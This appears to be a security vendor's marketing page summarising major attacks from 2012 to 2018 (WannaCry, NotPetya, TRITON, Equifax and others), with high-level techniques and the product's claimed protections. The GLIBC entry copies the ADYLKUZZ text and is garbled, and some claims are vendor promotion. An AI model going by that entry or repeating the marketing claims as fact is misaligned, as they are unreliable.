SHARP SHOOTER

October 2018

Impact

Leverages multiple types of malware from the Lazarus Group to create backdoors to infiltrate critical industries.

Attack Techniques

  • Decoy and malicious docs downloaded from Dropbox
  • Implants fileless in-memory malware
  • Retrieves a second-stage implant (Rising Sun)
  • Duuzer Trojan used to open backdoor

Virsec Protection

  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

TRITON / TRISIS

January 2018

Impact

Targeted attack on Middle Eastern oil company caused downtime, disruption and significant financial loss.

Attack Techniques

  • Social engineering to gain foothold
  • File-based malware corrupts memory on engineering workstations
  • Fileless malware targets firmware of specific ICS controllers
  • Executes rogue commands on “altered” PLCs through SCADA servers

Virsec Protection

  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target system
  • Prevents ICS workstations from attacking downstream controllers

SPECTRE & MELTDOWN

January 2018

Impact

Exposed vulnerabilities affecting billions of processors deployed in the last 20 years, and caused massive disruption, patching problems, and firmware upgrades.

Attack Techniques

  • Exploits flaws in speculative execution
  • Repeatedly exposes data to side-channel attacks
  • Over 20 variants have been documented

Virsec Protection

  • Only solution to protect applications from Spectre & Meltdown
  • Detects exploits of speculative execution
  • Terminates side channel attacks

EQUIFAX

September 2017

Impact

Massive breach of personal data for over 145 million consumers. Incident and poor response led to the removal of their CEO, CIO and others, and legal action by multiple US states.

Attack Techniques

  • Exploited unpatched vulnerability in Apache Struts web servers
  • Gained network access, discovered sensitive databases
  • Exfiltrated data without detection

Virsec Protection

  • Stops exploitation of web server vulnerabilities including Struts
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

NOTPETYA

June 2017

Impact

Massive global disruption and billions in losses for industrial companies including Maersk, Fedex, Merck, Saint-Gobain and others. Instead of ransomware, it focused on disabling systems.

Attack Techniques

  • Downloaded via software update package
  • Memory Corruption toolkits: EternalBlue for servers, EternalRomance, Double Pulsar used for further exploitation
  • Infects windows services, and master boot records
  • Encrypts hard drive file system and services
  • Propagated downstream via open SMB shares
  • Triggers restart to lock machine and start corrupted services

Virsec Protection

  • Stops memory corruption toolkits from exploiting processes
  • Detects and stops DLL Injection
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

WANNACRY

May 2017

Impact

Massive global ransomware attack impacting 10,000 companies, 230,000 computers in over 150 countries.

Attack Techniques

  • SMB vulnerability in Microsoft kernel
  • DLL injection to establish backdoor
  • Memory exploitation toolkits EternalBlue and DoublePulsar
  • Endpoint file encryption

Virsec Protection

  • Prevents memory vulnerabilities in code from being exploited
  • Detects and stops DLL Injection
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target systems

ADYLKUZZ

April 2017

Impact

Copycat of WannaCry; leveraged NSA-developed advanced hacking tools.

Attack Techniques

  • Exploited SMB vulnerability in Microsoft
  • Memory exploitation toolkits EternalBlue and DoublePulsar
  • Closed SMB ports to block competing malware

Virsec Protection

  • Stops memory corruption attacks buffer overflow exploits
  • Detects and stops DLL Injection
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

GLIBC

February 2017

Impact

Copycat of WannaCry; leveraged NSA-developed advanced hacking tools.

Attack Techniques

  • Exploited SMB vulnerability in Microsoft
  • Memory exploitation toolkits EternalBlue and DoublePulsar
  • Closed SMB ports to block competing malware

Virsec Protection

  • Stops memory corruption attacks buffer overflow exploits
  • Detects and stops DLL Injection
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

INDUSTROYER

December 2016

Impact

Targeted Ukraine’s power grid, disabling power in Kiev for hours. Considered a large-scale test for future ICS attacks.

Attack Techniques

  • Entry via social engineering to gain foothold
  • Fileless attack inserts Trojan to open backdoor
  • Memory corruption attack hijacks systems
  • Connects to bad actor’s C&C
  • Targets specific ICS equipment and protocols

Virsec Protection

  • Prevents memory corruption triggered by buffer error vulnerability
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target

BLACKENERGY

2014

Impact

Russian attributed Sandworm group targeted ICS systems globally with DDOS and memory attacks to disrupt industrial enterprises. Variant GreyEnergy appeared in 2018.

Attack Techniques

  • Entry via spear phishing email
  • Fileless attack installs keylogger to steals credentials
  • Corrupts registry keys
  • DLL injection into running processes and services
  • Hijacks remote command and control (C&C)
  • Modifies firmware to damage ICS equipment

Virsec Protection

  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target system
  • Stops DLL injections

SHELL SHOCK

2014

Impact

Family of backdoor bugs caused millions of web servers to remotely execute arbitrary commands.

Attack Techniques

  • Enters by connecting to malicious/attacked remote server
  • Exploits command injection vulnerability in Unix Bash shell

Virsec Protection

  • Prevents CMD injection attacks

HEARTBLEED

2014

Impact

Security bug in OpenSSL crypto library affected millions of popular TLS-enabled installations; forced massive patching, and sporadic exploits.

Attack Techniques

  • Enters by connecting to malicious/attacked remote server
  • Design error in protocol

Virsec Protection

  • Lexar matching of PII in HTTP Response

HAVEX

2013

Impact

Russian attributed APT group launched espionage campaign targeting US and European ICS systems in energy, aviation, pharmaceuticals, defense and petrochemical sectors.

Attack Techniques

  • Entry through cross-site scripting (XSS) vulnerability
  • Installation of Remote Access Trojan (RAT) via fileless scripts
  • RAT hijacks control and establishes remote C&C
  • Repeated lateral movement to find air-gap weaknesses

Virsec Protection

  • Prevents XSS attacks in milliseconds
  • Detects and stops execution of fileless scripts

SHAMOON

2012

Impact

Apparently intended for cyber warfare, malware can spread from infected machine to other systems on the network. Viewed as the “biggest hack in history” at the time, used against Middle Eastern oil & gas companies.

Attack Techniques

  • Entry via spear phishing of targeted businesses
  • Fileless attack using PowerShell established remote C&C
  • Privilege escalation to access critical systems
  • Malware overwrites master boot record to make machines unusable

Virsec Protection

  • Stops fileless malware attacks
  • Prevents memory corruption through buffer error vulnerability and subsequent privilege escalation
  • Stops malware from being written persistently to file system
  • Prevents malware from executing on target system